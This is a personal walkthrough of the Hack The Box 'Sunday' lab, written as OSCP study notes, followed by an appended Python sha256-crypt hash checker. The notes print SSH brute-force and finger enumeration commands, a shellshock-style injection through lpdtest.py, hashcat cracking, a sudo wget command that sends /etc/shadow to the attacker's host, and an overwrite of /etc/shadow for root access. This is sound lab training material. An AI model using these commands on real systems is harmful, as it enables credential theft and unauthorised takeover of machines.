OSCP Notes
HTB Write-up Sunday
What I learned today:
Nmap: -p- --max-retries 1 (or 0) speeds up the all-port scan a bit.
Finger: the finger-user-enum tool revealed some usernames on the service.
SSH: add a key exchange algorithm with -oKexAlgorithms=+ALGORITHM_NAME
Piping into |less -S kills off line wrapping (otherwise the output is too messy).
For SSH password cracking, use patator.
Syntax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
Wget
  • wget -i to read files
  • wget --post-file=FILE_PATH IP to upload a file to kali (nc open on 80)
Create a hash
openssl passwd -5 -salt thesalt pass123
Regular enumeration won't show the extra open ports, which include the SSH port.
Do a -p- scan even though it takes forever (speed it up with -p- --max-retries 1 (or 0)). Once we find weird ports, do a port-specific scan like:
nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address
Enumeration
For finger enum, I used finger-user-enum (pentestmonkey).
For usernames, used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 |less -S
Piping into |less -S kills off line wrapping (otherwise the output is too messy).
We got sammy and sunny.
We can try to ssh in. The password for the sammy account was sunny.
When you try to log in, it might give this error:
"No matching key exchange method found. Their offer: ~"
Try adding the key exchange algorithm with "-oKexAlgorithms=+ALGORITHM_NAME".
Now we are in.

SSH Password Cracking

For ssh password cracking, use patator
Syntax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
Use a password list that's not too big, or create your own.
515 printer
Reference: 515 - Pentesting Line Printer Daemon (LPD) (HackTricks)
Found info about LPD there and tried it, but didn't get a result, only a negative acknowledgement.
oh wait...
python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'
I used the above command and it executed it...
Does that mean we can get the shell back?
--- didn't work.

Priv Esc

When looking into the files, we found a backup file and a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for sammy.
Switched user to sammy with the password.
Now it's showing the system name, SunOS 5.11. Maybe it's vulnerable to shellshock?
Random='() { :;}; echo nyannyannyan' bash -c :
If this prints the string, it's possible that the system is vulnerable to shellshock.
sudo -l to check if any environment variables are kept.
No env variables.
Do env and just pick one to use.
Looks like it's not vulnerable this time.
When checking sammy's sudo -l,
wget is available. wget -h shows all the options we could use:
wget -i enabled us to see root files.
Create a file called "troll" with the content below:
#!/usr/bin/bash
bash
Upload it with the sammy account:
sudo wget http://10.10.14.131/troll -O /root/troll
and switch back to sunny (who has sudo access) to execute it.
In this particular box, there's a task that overwrites the file.
To prevent this, have two ssh sessions open: one as sammy (wget to upload the file) and one as sunny (to execute the file).
On sammy, use
sleep 5; sudo wget 10.10.14.131/troll -O /root/troll
to make the system sleep for 5 seconds, and then quickly run the file in the other session.
For some reason, I couldn't execute /root/troll, so I'm going to try another method.
Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to Kali (nc listening on 80).
Created a new file called shadow:
Create a new hash:
openssl passwd -5 -salt thesalt pass123
Paste the hash at the top.
Upload the shadow file from the sammy account:
sudo wget 10.10.14.131/shadow -O /etc/shadow
We can confirm that the shadow file got updated.
With the new password, I got in!
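What `openssl passwd -5` (above) and hashcat mode 7400 (Priv Esc) actually compute: an added example, not code from this write-up, implementing sha256-crypt ($5$) in pure Python so a shadow entry can be verified offline against a known password. SAMPLE is a constructed shadow line built from the sha-crypt specification's published test vector; the functions are assumed names.

```python
# Added example, not code from the write-up: pure-Python sha256-crypt ($5$), the scheme
# behind `openssl passwd -5` and hashcat mode 7400, for verifying a shadow entry offline.
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
ORDER = [(0, 10, 20), (21, 1, 11), (12, 22, 2), (3, 13, 23), (24, 4, 14),  # digest byte
         (15, 25, 5), (6, 16, 26), (27, 7, 17), (18, 28, 8), (9, 19, 29)]  # permutation

def _fit(digest: bytes, length: int) -> bytes:
    return (digest * (length // 32 + 1))[:length]  # repeat a 32-byte digest, cut to length

def sha256_crypt(password: str, salt: str, rounds: int = 5000) -> str:
    """Return the 43-char hash field of '$5$<salt>$<hash>' (Drepper's algorithm)."""
    pw, sl = password.encode(), salt[:16].encode()  # salt is capped at 16 chars
    b = hashlib.sha256(pw + sl + pw).digest()
    a = hashlib.sha256(pw + sl)
    a.update(_fit(b, len(pw)))
    n = len(pw)
    while n:                  # one extra block per bit of the password length
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    p = _fit(hashlib.sha256(pw * len(pw)).digest(), len(pw))
    s = _fit(hashlib.sha256(sl * (16 + a[0])).digest(), len(sl))
    for i in range(rounds):   # the cost loop that makes mode 7400 slow to crack
        c = hashlib.sha256(p if i & 1 else a)
        if i % 3:
            c.update(s)
        if i % 7:
            c.update(p)
        c.update(a if i & 1 else p)
        a = c.digest()
    triples = [(a[i], a[j], a[k], 4) for i, j, k in ORDER] + [(0, a[31], a[30], 3)]
    chars = []
    for b2, b1, b0, n in triples:  # 24-bit groups, 6 bits per char, low bits first
        w = (b2 << 16) | (b1 << 8) | b0
        chars.extend(ITOA64[(w >> (6 * k)) & 0x3F] for k in range(n))
    return "".join(chars)

def check_shadow_line(line: str, candidate: str) -> bool:
    """True if the $5$ hash in one /etc/shadow line matches `candidate`."""
    parts = line.split(":")[1].split("$")  # ['', '5', ['rounds=N',] salt, hash]
    if len(parts) < 4 or parts[1] != "5":  # not a sha256-crypt entry
        return False
    rounds = int(parts[2][7:]) if parts[2].startswith("rounds=") else 5000
    return hmac.compare_digest(sha256_crypt(candidate, parts[-2], rounds), parts[-1])

# Constructed shadow line built from the test vector in the sha-crypt specification.
SAMPLE = "root:$5$saltstring$5B8vYYiY.CVt1RlTTf8KbXBH3hsxY/GNooZaBBGWEc5:19000:0:99999:7:::"
```

`sha256_crypt("pass123", "thesalt")` reproduces the hash field of the `openssl passwd -5 -salt thesalt pass123` line from the notes, which is the value hashcat -m 7400 has to recompute 5000 rounds deep for every guess.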